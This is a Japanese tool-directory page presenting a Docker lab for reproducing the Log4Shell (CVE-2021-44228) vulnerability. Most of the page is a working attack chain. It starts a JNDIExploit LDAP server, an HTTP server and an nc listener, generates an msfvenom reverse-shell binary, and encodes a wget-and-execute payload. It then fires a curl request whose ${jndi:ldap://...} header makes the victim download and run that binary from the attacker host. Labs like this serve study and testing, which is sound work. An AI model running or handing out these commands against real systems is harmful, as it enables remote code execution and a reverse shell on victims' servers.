Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Log4Shell-CVE-2021-44228-ENV — Log4Shell Docker 環境 | Kitploit
ツール/GitHubGitHub/ycdxsb/log4shell-cve-2021-44228-env
コンテナセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育ラボと実践
GitHubycdxsb/log4shell-cve-2021-44228-env

Log4Shell-CVE-2021-44228-ENV

Log4Shell Docker 環境

リポジトリを見る
4144年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Log4Shell再現環境

例の説明

被害マシンIP:47.47.47.47

攻撃マシンIP:48.48.48.48

被害マシンで脆弱性Dockerを実行

  • DockerFileを使用してDockerイメージをビルドして実行:
root@kitploit:~
docker build . -t vuln
docker run -p 8080:8080 --name vuln vuln

攻撃マシンで攻撃Dockerを実行

  • DockerFileを使用してDockerイメージをビルドして実行
root@kitploit:~
docker build . -t attack
docker run -itd -p 9999:9999 -p 8888:8888 -p 1389:1389 -p 9000:9000 --name attack attack

攻撃マシンの環境準備

3つの異なるシェルでコマンドを実行し、シェルがアクティブであることを確認する必要がある

  • 攻撃マシンでJDNIサーバーを起動
root@kitploit:~
docker exec -it attack /bin/bash
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 48.48.48.48 -p 8888
  • 攻撃マシンでHTTPサーバーを起動
root@kitploit:~
docker exec -it attack /bin/bash
python3 -m http.server 9999
  • 攻撃マシンでncでポートをリッスン
root@kitploit:~
docker exec -it attack /bin/bash
nc -lvvp 9000

攻撃マシンで攻撃を実行

同じシェルでコマンドを実行

root@kitploit:~
docker exec -it attack /bin/bash
  • 攻撃マシンでリバースシェルファイルを準備
root@kitploit:~
msfvenom -p linux/x64/shell_reverse_tcp LHOST=48.48.48.48 LPORT=9000 -f elf -o /rev.elf
  • 攻撃マシンでペイロードを準備
root@kitploit:~
echo 'wget http://48.48.48.48:9999/rev.elf -O /tmp/rev.elf && chmod +x /tmp/rev.elf && /tmp/rev.elf' | base64
# d2dldCBodHRwOi8vNDguNDguNDguNDg6OTk5OS9yZXYuZWxmIC1PIC90bXAvcmV2LmVsZiAmJiBjaG1vZCAreCAvdG1wL3Jldi5lbGYgJiYgL3RtcC9yZXYuZWxmCg==
  • 攻撃ペイロードを送信
root@kitploit:~
curl 47.47.47.47:8080 -H 'X-Api-Version: ${jndi:ldap://48.48.48.48:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNDguNDguNDguNDg6OTk5OS9yZXYuZWxmIC1PIC90bXAvcmV2LmVsZiAmJiBjaG1vZCAreCAvdG1wL3Jldi5lbGYgJiYgL3RtcC9yZXYuZWxmCg==}'

コマンド生成

root@kitploit:~
python3 command_gen.py vuln_ip attack_ip

ビデオデモ

Video

参考

  • https://github.com/christophetd/log4shell-vulnerable-app
  • https://github.com/twseptian/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab
ツールをダウンロード